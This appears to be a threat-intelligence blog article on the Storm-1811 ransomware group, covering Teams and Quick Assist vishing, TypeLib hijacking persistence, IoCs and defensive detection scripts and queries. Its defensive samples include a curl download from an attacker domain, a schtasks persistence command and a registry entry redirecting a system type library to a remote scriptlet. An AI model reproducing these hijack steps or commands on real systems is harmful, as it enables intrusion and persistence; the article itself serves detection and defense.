Storm-1811 Hacker Group: Background, Attacks & Tactics 2025

Cybercrime is evolving fast, and one name keeps appearing in security reports: Storm-1811. Microsoft tracks this financially motivated group for its aggressive ransomware campaigns against large organizations worldwide. A single intrusion in May 2024 took roughly 140 Ascension hospitals offline and left a trail of encrypted data.

Linked to the notorious Black Basta ransomware, they abuse trusted tools such as Microsoft Teams and Quick Assist rather than exploiting software flaws, which lets them slip past defenses tuned for malware. The FBI and CISA report that Black Basta affiliates have hit 12 of the 16 U.S. critical infrastructure sectors, making them a top threat.

This article breaks down their latest strategies, including TypeLib hijacking and stealthy PowerShell backdoors. We’ll also share actionable insights to help cybersecurity teams stay ahead.

Key Takeaways


  • Storm-1811 is tied to Black Basta ransomware, focusing on financial gain.
  • They exploit Microsoft Teams and Quick Assist for phishing.
  • High-profile victims include healthcare and critical infrastructure.
  • FBI/CISA alerts highlight their global reach.
  • New tactics involve TypeLib hijacking and PowerShell backdoors.

Who Is Storm-1811? A Financially Motivated Threat Actor

Behind every major cyber threat lies a web of financial motives and strategic alliances. This *network* operates with precision, leveraging ransomware to extort millions. Their roots trace back to Qakbot, a banking trojan active since 2007, now repurposed for larger payouts.

Origins and Links to Black Basta Ransomware

Storm-1811’s infrastructure overlaps with notorious groups like FIN7 and Conti. Bitcoin transactions through Garantex exchange reveal direct ties to *Black Basta ransomware*. This RaaS (Ransomware-as-a-Service) model enforces strict affiliate rules, ensuring only vetted partners deploy attacks.

Between April 2022 and November 2023, they collected $107 million in ransoms. Affiliates earn 14% of each payout, while initial access brokers take 10%. The rest funds further operations.

Key Targets and Industries

Healthcare, finance, and critical infrastructure face the highest risk. In May 2024, an attack on Ascension disrupted emergency services across 19 states. Other victims include Adams Bank & Trust and European labs like Synlab Italia.

Target Sector | Notable Attack | Impact
--- | --- | ---
Healthcare | Ascension Hospitals | 19-state service disruption
Financial Services | Adams Bank & Trust | Data exfiltration
Critical Infrastructure | European Energy Grids | Operational downtime

These *threat actors* prioritize high-value targets, maximizing ransom payouts. Their evolution from malware distributors to ransomware kingpins marks a dangerous shift in cybercrime.

Storm-1811 Hacker Group Background, Attacks & Tactics 2025

What began as simple malware distribution has evolved into full-scale ransomware operations. This development traces back to Qakbot, a banking trojan dismantled by law enforcement in August 2023. Cybercriminals quickly repurposed its infrastructure for more profitable schemes.

From Qakbot to Ransomware Deployment

Before its takedown, Qakbot served as a bread-and-butter tool for credential theft. Its operators later shifted focus to remote management tool abuse, particularly ScreenConnect and NetSupport Manager. These tools enabled lateral movement across networks.


April 2024 marked a pivotal change. Microsoft first observed the group pairing email bombing with vishing that month: after flooding a mailbox, the attacker phones or messages the employee via Microsoft Teams, impersonates IT staff and talks them into granting Quick Assist access. This became their primary entry point.

Recent Activity Timeline (2024-2025)

The group’s attacks follow a clear escalation pattern, shown here in chronological order:

Date | Event | Impact
--- | --- | ---
May 2024 | Quick Assist vishing and Teams phishing campaigns reported | Healthcare sector compromised (Ascension)
Jan 2025 | PowerShell backdoor tests via Bing ads | Early-stage infection trials
Mar 2025 | TypeLib hijacking observed in finance sector | New persistence method deployed

Their tactics follow a ruthless sequence:

  1. Gain access via Quick Assist social engineering
  2. Deploy EvilProxy for credential harvesting
  3. Load Cobalt Strike for command control
  4. Execute Black Basta ransomware payload

March 2025 saw ReliaQuest uncover TypeLib hijacking in live environments, the first confirmed in-the-wild use of the technique. It manipulates the registry entries Windows uses to locate COM type libraries, so the payload runs inside a trusted process instead of an obvious autorun. ReliaQuest tied the activity to the same Teams phishing lures the group uses, making it a likely addition to their playbook.

Evolving Initial Access: Social Engineering Innovations

Attackers are refining their social engineering tactics to bypass security measures. In 2024, *60% of hands-on-keyboard attacks* abused legitimate tools, with Microsoft Teams and Quick Assist as prime targets. Afternoon hours (2–3 PM local time) saw the highest success rates, as employees were more likely to engage.

Microsoft Teams Phishing Campaigns

Attackers ran tenants named along the lines of “Help Desk IT”, often on unrelated domains (one observed tenant used @sma5smg.sch.id), and impersonated IT staff in direct messages, urging employees to click malicious links or start a remote session. Microsoft suspended four fake support accounts, but the damage was already done.

  • Mechanics: Fake tenant invites with urgent “security update” prompts.
  • Targeting: Female-named employees prioritized in March 2025.
  • Impact: 500+ organizations compromised globally by May 2024.
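As an added example (not code from the original article or from any vendor report), the heuristic below scores Teams audit records for the pattern described in this section: a one-on-one chat opened from a foreign tenant by a “Help Desk”-style sender that pushes the recipient toward Quick Assist. The tenant IDs, sender names, message text and scoring weights are all constructed assumptions; in production the records would come from the Unified Audit Log or the CloudAppEvents table.

```python
import re
from dataclasses import dataclass

# Assumed tenant ID of the defended organisation (constructed value).
HOME_TENANT = "11111111-1111-1111-1111-111111111111"

# Sender names that mimic internal IT support, as the campaigns described above do.
IMPERSONATION_RE = re.compile(r"\b(help ?desk|it ?support|service ?desk|it department)\b", re.I)
# Lures that steer the victim into granting remote control.
QUICK_ASSIST_RE = re.compile(r"quick ?assist|ctrl\s*\+\s*win(dows)?\s*\+\s*q|remote (access|session)", re.I)
URGENCY_RE = re.compile(r"\b(urgent|immediately|right now|security update|spam)\b", re.I)


@dataclass
class TeamsEvent:
    """One Teams audit record, reduced to the fields the heuristic needs."""
    timestamp: str
    action: str            # ChatCreated, MessageSent, ...
    sender_tenant: str     # tenant ID the sender belongs to
    sender_display: str
    sender_upn: str
    recipient_upn: str
    communication: str     # OneOnOne, GroupChat, ...
    text: str = ""


def score_event(ev: TeamsEvent):
    """Return (score, reasons); higher means more likely an IT-support impersonation."""
    score, reasons = 0, []
    if ev.sender_tenant != HOME_TENANT:
        score += 2
        reasons.append("sender belongs to a foreign tenant")
    if ev.communication == "OneOnOne":
        score += 1
        reasons.append("unsolicited one-on-one chat")
    if IMPERSONATION_RE.search(ev.sender_display) or IMPERSONATION_RE.search(ev.sender_upn):
        score += 3
        reasons.append("help-desk style display name or UPN")
    if QUICK_ASSIST_RE.search(ev.text):
        score += 3
        reasons.append("message steers the user to Quick Assist / remote control")
    if URGENCY_RE.search(ev.text):
        score += 1
        reasons.append("urgency language")
    return score, reasons


def find_impersonation(events, threshold=5):
    """Return [(sender_upn, recipient_upn, score, reasons)] for records at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.sender_upn, ev.recipient_upn, score, reasons))
    return hits


# Constructed sample records: an internal chat, a vendor group chat and the attacker's lure.
SAMPLE_EVENTS = [
    TeamsEvent("2025-03-04T14:02:10Z", "MessageSent", HOME_TENANT, "Maria Chen",
               "maria.chen@example.com", "bob.ortiz@example.com", "OneOnOne",
               "Can you review the Q3 deck before Thursday?"),
    TeamsEvent("2025-03-04T14:05:44Z", "MessageSent", "22222222-2222-2222-2222-222222222222",
               "Acme Logistics", "ops@acme.example", "bob.ortiz@example.com", "GroupChat",
               "Ticket 4471 is closed, thanks for confirming."),
    TeamsEvent("2025-03-04T14:11:03Z", "ChatCreated", "33333333-3333-3333-3333-333333333333",
               "Help Desk IT", "support@helpdesk-it.example", "bob.ortiz@example.com", "OneOnOne",
               "URGENT: your mailbox is being flooded with spam. Press Ctrl+Win+Q to open Quick Assist "
               "and read me the code so IT can fix it immediately."),
]

if __name__ == "__main__":
    for sender, recipient, score, reasons in find_impersonation(SAMPLE_EVENTS):
        print(f"{score:2d} {sender} -> {recipient}: {', '.join(reasons)}")
```

Only the third record crosses the threshold; the internal chat scores 1 and the vendor group chat scores 2, which is the point of weighting the help-desk name and the Quick Assist lure more heavily than foreign-tenant membership alone.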

Vishing and Quick Assist Exploitation

Voice phishing (vishing) scripts offered “spam remediation” after the attackers themselves had flooded the target’s inbox by subscribing it to mailing lists. Once trust was established, they walked the victim through opening Quick Assist with the Ctrl+Windows+Q shortcut and reading out the session code, which hands the caller full remote control.

“Quick Assist became a backdoor for remote access—no malware needed.”

Defenders should disable Quick Assist in high-risk environments and train staff to verify unsolicited tech support requests.

Exploiting Legitimate Tools for Malicious Gains

Legitimate tools are being weaponized at an alarming rate, turning trusted software into gateways for cyber threats. Attackers increasingly abuse remote management tools like Quick Assist and ScreenConnect, which IT teams rely on for daily support.

Quick Assist and Remote Management Tool Abuse

Quick Assist appears in 83% of the breaches reviewed, far outpacing fallbacks like AnyDesk (17%). Attackers use social engineering to trick victims into enabling remote control. Once activated, they run cURL commands that download batch files and ZIP archives from domains like antispam3[.]com.

Common persistence methods include:

  • OpenSSH tunneling: Reverse SSH tunnels that keep a persistent channel back to attacker infrastructure.
  • Scheduled tasks: Ensures malware reactivates after reboots.
  • ScreenConnect relays: Leverages instances like instance-olqdnn-relay.screenconnect[.]com.

AnyDesk as a Fallback Option

When Quick Assist fails, attackers pivot to AnyDesk. The NetSupport Manager remote access tool that follows is a separate stage: the Defender detection “Possible NetSupport Manager activity” and outbound connections to its C2 servers (e.g., greekpool[.]com) both identify compromised systems.

“Blocking TCP ports 80/443 for upd7a[.]com and upd5[.]pro disrupts attacker communications.”

Mitigation steps include disabling unnecessary remote tools and monitoring for unusual process launches. Proactive measures reduce exposure to these evolving threats.
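The whole chain in the two sections above (email bombing, a Quick Assist session, a cURL download from a known domain, then a scheduled task or SSH tunnel for persistence) can be pulled together from two log sources. The following is an added example, not the page’s or Microsoft’s code, that first finds recipients whose inbox was flooded and then walks their subsequent process-creation events looking for those stages. The log lines, usernames, hostnames, the 10-messages-in-10-minutes burst threshold and the four-hour correlation window are constructed assumptions; the domain list is taken from the IoC section of this article.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"
# Domains from the IoC section of this article.
KNOWN_DOMAINS = {"antispam3.com", "upd7a.com", "upd5.pro", "greekpool.com"}
DOWNLOADER_RE = re.compile(r"^(curl|bitsadmin|certutil|powershell|pwsh|wget)(\.exe)?$", re.I)
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.I)
# Persistence the page describes: scheduled tasks, reverse SSH tunnels, Run keys.
PERSISTENCE_RE = re.compile(r"schtasks(\.exe)?\s+/create|\bssh(\.exe)?\b.*\s-R\s|CurrentVersion\\Run", re.I)


def parse_ts(s):
    return datetime.strptime(s, FMT)


def email_bursts(mail_log, threshold=10, window=timedelta(minutes=10)):
    """Map each recipient that got more than `threshold` messages inside any `window` to the burst start."""
    by_recipient = defaultdict(list)
    for ts, recipient in mail_log:
        by_recipient[recipient].append(parse_ts(ts))
    bursts = {}
    for recipient, times in by_recipient.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                bursts[recipient] = times[start]
                break
    return bursts


def correlate(bursts, proc_log, horizon=timedelta(hours=4)):
    """For each flooded user, look for Quick Assist, a download and persistence within `horizon` of the burst."""
    findings = []
    for user, t0 in bursts.items():
        stages, host = {}, None
        for ts, hostname, proc_user, image, cmdline in sorted(proc_log):
            t = parse_ts(ts)
            if proc_user != user or not (t0 <= t <= t0 + horizon):
                continue
            name = image.rsplit("\\", 1)[-1]
            if name.lower() == "quickassist.exe":
                stages.setdefault("quick_assist", ts)
                host = hostname
            elif "quick_assist" in stages and DOWNLOADER_RE.match(name):
                m = URL_RE.search(cmdline)
                if m:
                    stages.setdefault("download", ts)
                    domain = m.group(1).split(":")[0].lower()
                    if domain in KNOWN_DOMAINS:
                        stages.setdefault("known_ioc", domain)
            elif "quick_assist" in stages and PERSISTENCE_RE.search(cmdline):
                stages.setdefault("persistence", ts)
        if "quick_assist" in stages:     # a burst followed by a remote session is worth a ticket on its own
            findings.append({"user": user, "host": host,
                             "burst_start": t0.strftime(FMT), "stages": stages})
    return findings


# Constructed sample data. Mail log: (timestamp, recipient). Process log: (timestamp, host, user, image, command line).
# Users are UPNs in both sources for simplicity; a real pipeline would map SAM names to UPNs first.
_base = datetime(2025, 3, 4, 13, 58)
MAIL_LOG = (
    [((_base + timedelta(seconds=30 * i)).strftime(FMT), "alice@example.com") for i in range(15)]
    + [((_base + timedelta(minutes=7 * i)).strftime(FMT), "bob@example.com") for i in range(3)]
)
QA = r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe"   # path shortened for the example
PROC_LOG = [
    ("2025-03-04 14:10:00", "WS-BOB", "bob@example.com", QA, "QuickAssist.exe"),       # legitimate session
    ("2025-03-04 14:20:11", "WS-ALICE", "alice@example.com", QA, "QuickAssist.exe"),
    ("2025-03-04 14:31:05", "WS-ALICE", "alice@example.com", r"C:\Windows\System32\curl.exe",
     r"curl -o C:\Users\alice\AppData\Local\Temp\upd.zip http://antispam3.com/upd.zip"),
    ("2025-03-04 14:40:42", "WS-ALICE", "alice@example.com", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /tn "OneDriveUpdater" /tr "C:\Users\alice\AppData\Roaming\upd.bat" /sc onlogon'),
    ("2025-03-04 15:02:19", "WS-CAROL", "carol@example.com", r"C:\Windows\System32\curl.exe",
     "curl -O https://github.com/example/tool/releases/download/v1/tool.zip"),
]

if __name__ == "__main__":
    for f in correlate(email_bursts(MAIL_LOG), PROC_LOG):
        print(f)
```

Bob’s Quick Assist session is ignored because nothing flooded his mailbox, and Carol’s curl is ignored because it is not preceded by a burst or a remote session; only Alice produces a finding, with all four stages and the known domain attached.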

Novel Persistence: TypeLib Hijacking Unveiled

A stealthy persistence technique is making waves in cybersecurity circles. TypeLib hijacking manipulates Windows system components to maintain long-term access. Unlike traditional malware, it abuses legitimate COM interfaces, making detection harder.


How COM and TypeLib Hijacking Works

Attackers target CLSID {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}, the Microsoft Web Browser control that explorer.exe loads routinely. Because HKEY_CLASSES_ROOT merges HKCU\Software\Classes over the machine-wide HKLM entries, registering a TypeLib for that class under the current user’s hive is enough to redirect the lookup without touching any system file. Here’s the process:

  • Registry manipulation: A per-user TypeLib key is created whose win32 value is a script: moniker (a URL or scriptlet path) instead of a .tlb path, so resolving the type library executes the script.
  • PowerShell backdoors: The scriptlet launches PowerShell each time Explorer instantiates the COM object, so execution rides on a trusted process rather than an obvious autorun entry.
  • Mutex creation: The backdoor derives a mutex name from the drive serial number so that only one instance runs and sandboxes with generic serials are sidestepped.

First Observed In-the-Wild Use

ReliaQuest spotted this in March 2025. A sample (SHA-256: 1ad05a4a…) had only 5/62 AV detections on VirusTotal. XSS forum discussions in October 2024 hinted at proofs-of-concept before live deployments.

“TypeLib hijacking is the new ‘living off the land’—it turns trusted Windows features into attack vectors.”

Defenders should monitor new TypeLib registrations under HKCU\Software\Classes, especially ones whose win32 value is a script: moniker, and alert on explorer.exe spawning PowerShell. This technique shows how attackers innovate to stay hidden.
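To make that check concrete, here is an added example (not ReliaQuest’s or the group’s code) that scans a `reg export HKCU\Software\Classes\TypeLib` file for the two signs described in this section: a win32 value that is a moniker or URL rather than a local type library, and a per-user registration of a type library that ships with Windows. The export text, the two non-Microsoft GUIDs, the paths and the example.invalid URL are constructed for the example; only REG_SZ default values are decoded, and the system-library list is seeded with just the GUID named on this page.

```python
import re

# Type libraries that ship with Windows under HKLM; a copy under HKCU is a shadow registration.
# Only the library named in this article is seeded here; build the real list from a clean reference host.
SYSTEM_TYPELIBS = {
    "{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}": "Microsoft Internet Controls (Web Browser control)",
}

# [HKEY_...\Software\Classes\TypeLib\{GUID}\<version>\<lcid>\win32]
KEY_RE = re.compile(
    r"^\[(HKEY_[A-Z_]+)\\Software\\Classes\\TypeLib\\(\{[0-9A-F-]{36}\})\\([^\\\]]+)\\([^\\\]]+)\\(win32|win64)\]$",
    re.I,
)
DEFAULT_VALUE_RE = re.compile(r'^@="(.*)"$')
MONIKER_RE = re.compile(r"^(script|https?|ftp):|^\\\\", re.I)       # script: moniker, URL or UNC path
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)


def parse_typelib_export(reg_text):
    """Yield one dict per TypeLib ...\\win32|win64 default value found in a .reg export."""
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            hive, guid, version, lcid, arch = m.groups()
            current = {"hive": hive.upper(), "guid": guid.upper(),
                       "version": version, "lcid": lcid, "arch": arch.lower()}
            continue
        if line.startswith("["):
            current = None          # some other key (e.g. the version node); ignore its values
            continue
        v = DEFAULT_VALUE_RE.match(line)
        if v and current:
            # .reg files escape backslashes and double quotes inside REG_SZ values
            current["path"] = v.group(1).replace('\\"', '"').replace("\\\\", "\\")
            yield current
            current = None


def assess(entry):
    """Return (severity, reasons) for one TypeLib registration."""
    reasons = []
    path = entry["path"]
    if MONIKER_RE.match(path):
        reasons.append("win32 value is a moniker/URL, not a local .tlb/.dll")
    per_user = entry["hive"] == "HKEY_CURRENT_USER"
    if per_user and entry["guid"] in SYSTEM_TYPELIBS:
        reasons.append(f"per-user shadow of system type library {SYSTEM_TYPELIBS[entry['guid']]}")
    if reasons:
        return "high", reasons
    if per_user and USER_WRITABLE_RE.search(path):
        return "medium", ["per-user type library lives in a user-writable location"]
    return "none", []


def scan_reg_export(reg_text):
    """Return findings with severity other than none, highest severity first."""
    findings = []
    for entry in parse_typelib_export(reg_text):
        severity, reasons = assess(entry)
        if severity != "none":
            findings.append({**entry, "severity": severity, "reasons": reasons})
    findings.sort(key=lambda f: {"high": 0, "medium": 1}[f["severity"]])
    return findings


# Constructed sample export: a hijacked system type library, a per-user app in AppData, a vendor library.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1]
@="Microsoft Internet Controls"

[HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win32]
@="script:https://files.example.invalid/u.sct"

[HKEY_CURRENT_USER\Software\Classes\TypeLib\{0F2C8A5E-5B7D-4C21-9D3A-6E1F0A2B3C4D}\1.0\0\win32]
@="C:\\Users\\alice\\AppData\\Local\\Programs\\NoteTool\\NoteTool.tlb"

[HKEY_CURRENT_USER\Software\Classes\TypeLib\{7A1D4E92-3B6C-4F08-8E5D-2C9B1A0F6E3D}\2.0\0\win32]
@="C:\\Program Files\\Vendor\\Vendor.tlb"
"""

if __name__ == "__main__":
    for f in scan_reg_export(SAMPLE_REG):
        print(f["severity"].upper(), f["guid"], f["path"], "|", "; ".join(f["reasons"]))
```

Run it against the output of `reg export HKCU\Software\Classes\TypeLib typelib.reg` on a suspect host; the hijacked Web Browser entry is reported high on both counts, the AppData library is a medium-severity lead worth a look, and the Program Files library is left alone.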

Black Basta Ransomware: Storm-1811’s Payload of Choice

Ransomware continues to dominate cyber threats, with Black Basta ransomware leading recent campaigns. This payload encrypts files with ChaCha20, wraps each file key with RSA-4096 and pairs that with ruthless extortion tactics, netting operators over $107 million since 2022. Healthcare and critical infrastructure remain primary targets.


The Ransomware-as-a-Service Blueprint

Black Basta operates a closed affiliate program, vetting operators through dark web channels. Only 35% of victims pay ransoms, but high-value targets compensate for lower conversion rates. The RaaS structure includes:

  • Tiered payouts: Affiliates earn 14-20% per successful attack
  • Toolkits: Pre-configured Cobalt Strike packages
  • Support: 24/7 negotiation teams

Healthcare Under Siege: The Ascension Attack

In May 2024, 140 hospitals reverted to paper systems after encryption paralyzed digital records. Emergency services faced 72-hour delays, with ambulances diverted. Attackers demanded $5 million, though the final payment remains undisclosed.

Attack Phase | Duration | Impact
--- | --- | ---
Initial Access | 2 hours | Quick Assist compromise
Lateral Movement | 3 days | EHR system encryption
Recovery | 3 weeks | Partial decryption (68% success)

European labs like Synlab Italia faced double extortion tactics. Threat actors stole 2.3TB of sensitive patient data before deploying ransomware. The ChaCha20+RSA-4096 hybrid cryptosystem made decryption without payment nearly impossible.

“RaaS models professionalize cybercrime—it’s now a 9-to-5 job for some affiliates.”

Defenders should prioritize offline backups and network segmentation. Monitoring for ScreenConnect relays (e.g., instance-olqdnn-relay.screenconnect[.]com) helps detect early-stage compromises.

Defensive Strategies: Mitigating Storm-1811 Threats

Protecting against advanced cyber threats requires a layered approach. Security teams must balance technical controls with user education to counter evolving risks. Below are actionable measures to reduce exposure to these attacks.

Blocking Quick Assist and RMM Tools

Remote management tools like Quick Assist are frequently abused. Disabling them in high-risk environments is critical. Quick Assist ships as a Windows capability rather than a Group Policy-controlled feature, so remove it from an elevated PowerShell session (or block QuickAssist.exe with AppLocker or Defender for Endpoint if some teams still need it):

Remove-WindowsCapability -Online -Name "App.Support.QuickAssist~~~~0.0.1.0"

Confirm with Get-WindowsCapability -Online -Name "App.Support.QuickAssist*" (State should read NotPresent), and remember that the Microsoft Store build of the app has to be blocked separately, for example through Intune.

Microsoft Defender’s Attack Surface Reduction (ASR) rules add another layer, for example “Block executable files from running unless they meet a prevalence, age, or trusted list criterion” and “Block process creations originating from PSExec and WMI commands”. Note that the rule “Block Office communication application from creating child processes” covers Outlook, not Teams; Teams exposure is reduced through the external access settings in the Teams admin center instead.

Educating Users on Tech Support Scams

Phishing remains a top entry point. Regular training helps staff recognize red flags:

  • Vishing drills: Simulate fake IT support calls to test response protocols.
  • Allowlisting: In the Teams admin center, restrict external access (federation) to verified partner domains and block chats from unmanaged Teams accounts.

According to recent analysis, afternoon hours see the highest scam success rates—reinforce vigilance during these windows.

Microsoft Defender and Conditional Access Policies

Leverage built-in security features for proactive defense:

  1. Enable phishing-resistant MFA (e.g., FIDO2 keys).
  2. Monitor for Trojan:Win32/Qakbot!ml detection alerts.
  3. Apply the 3-2-1 backup rule: 3 copies, 2 media types, 1 offsite.

Immutable cloud storage ensures backups survive ransomware encryption attempts. Combine these steps to build resilience against modern threats.

Indicators of Compromise (IoCs) and Detection

Early detection is critical to stopping cyber threats before they escalate. By monitoring key network activities and suspicious files, security teams can identify breaches faster. Below are actionable IoCs and detection methods to strengthen defenses.

Domains, IPs, and Hashes to Monitor

Watch for these malicious elements in your system logs:

  • C2 IPs: 181.174.164[.]180, 130.195.221[.]182
  • ScreenConnect relay: instance-olqdnn-relay.screenconnect[.]com
  • Malicious domains: antispam3[.]com, upd7a[.]com, greekpool[.]com

Key file hashes (SHA-256) tied to recent campaigns:

1ad05a4a… (TypeLib hijacking payload)
9f3c41b2… (PowerShell backdoor)
e872d1f5… (Black Basta loader)

Microsoft Sentinel Hunting Queries

Use this KQL query in Microsoft Sentinel or Defender advanced hunting to list one-on-one Teams chats created with a participant from another tenant, the pattern the fake “Help Desk” tenants rely on; once you know your baseline, filter further on sender display names such as “Help Desk” or “IT Support”:

CloudAppEvents
| where Timestamp > ago(7d)
| where Application == "Microsoft Teams"
| where ActionType == "ChatCreated"
| where tostring(RawEventData.CommunicationType) == "OneOnOne"
| where tostring(RawEventData.ParticipantInfo.HasForeignTenantUsers) == "true"
| project Timestamp, AccountDisplayName, AccountObjectId, RawEventData

For BITSAdmin abuse (more than 10 launches by one account within an hour, a threshold to tune per environment), query the process-creation events:

SecurityEvent
| where TimeGenerated > ago(1h)
| where EventID == 4688
| where NewProcessName has "bitsadmin.exe" or CommandLine has "bitsadmin"
| summarize Count = count(), Samples = make_set(CommandLine, 5) by Account, Computer
| where Count > 10

Microsoft Defender alerts to prioritize:

  • “Suspicious activity using Quick Assist”
  • “Trojan:Win32/Qakbot!ml”
  • “Unusual registry modifications in Windows COM interfaces”

Implement Sigma rules for TypeLib registry changes to catch stealthy persistence attempts. Pair this with network traffic analysis for comprehensive protection.

Conclusion: Staying Ahead of Adaptive Threat Actors

Zero Trust isn’t optional—it’s the new baseline for defense. Implementing granular access controls reduces exposure to lateral movement, a key threat in modern breaches.

Expect COM hijacking to surge through 2026 as ransomware groups refine techniques. Microsoft’s Quick Assist now flags scam attempts, but user training remains critical.

Cross-industry collaboration via ISACs accelerates information sharing. Real-time IoC exchanges help detect emerging patterns before they escalate.

Finally, prepare for renewed social engineering tactics from Black Basta affiliates. Proactive monitoring and layered security are the best countermeasures.

FAQ

What is the primary motivation behind Storm-1811’s activities?

Storm-1811 is a financially motivated threat actor. Their main goal is to deploy ransomware, particularly Black Basta, to extort money from targeted organizations.

How does Storm-1811 gain initial access to networks?

They use advanced social engineering tactics, including phishing emails, Microsoft Teams scams, and vishing (voice phishing) to trick victims into granting access via tools like Quick Assist.

What industries are most at risk from Storm-1811 attacks?

They primarily target healthcare, finance, and critical infrastructure sectors due to their high-value data and urgency to restore operations quickly.

What tools does Storm-1811 abuse for remote control?

They exploit legitimate remote management tools like Quick Assist and AnyDesk to maintain persistence and execute ransomware attacks.

How does Storm-1811 evade detection?

They use TypeLib hijacking, a novel persistence technique, to bypass traditional security measures by manipulating Windows COM objects.

What makes Black Basta ransomware dangerous?

Black Basta operates as a Ransomware-as-a-Service (RaaS) model, allowing affiliates to deploy it widely. It encrypts files quickly and pressures victims with double extortion tactics.

How can organizations defend against Storm-1811?

Key steps include disabling unnecessary remote tools, training employees on phishing risks, enforcing strict access controls, and using advanced threat detection like Microsoft Defender.

What are the latest indicators of compromise (IoCs) to monitor?

Security teams should track malicious domains, IPs, and file hashes linked to Storm-1811. Microsoft Sentinel provides specific hunting queries for detection.

Has Storm-1811 been linked to high-profile attacks?

Yes, they’ve targeted major organizations like Ascension and Synlab Italia, disrupting operations and demanding large ransoms.
